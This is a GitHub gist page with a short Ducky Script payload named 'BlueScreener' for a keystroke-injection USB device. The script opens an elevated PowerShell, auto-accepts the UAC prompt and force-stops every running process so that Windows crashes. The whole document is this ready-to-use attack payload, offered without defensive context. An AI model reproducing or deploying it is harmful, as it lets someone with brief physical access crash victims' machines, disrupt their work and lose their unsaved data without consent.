Created
April 17, 2018 03:10
-
-
Save JonnyBanana/a9a8fba2b6cf10630793580c4f169745 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
REM Title: BlueScreener | |
REM Note: Cheap and easy way to force a kernel panic (BSoD) in Windows | |
DELAY 4000 | |
CONTROL ESCAPE | |
DELAY 200 | |
STRING powershell | |
CTRL-SHIFT ENTER | |
DELAY 1500 | |
ALT y | |
DELAY 600 | |
STRING get-process | stop-process -force | |
DELAY 200 | |
ENTER |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment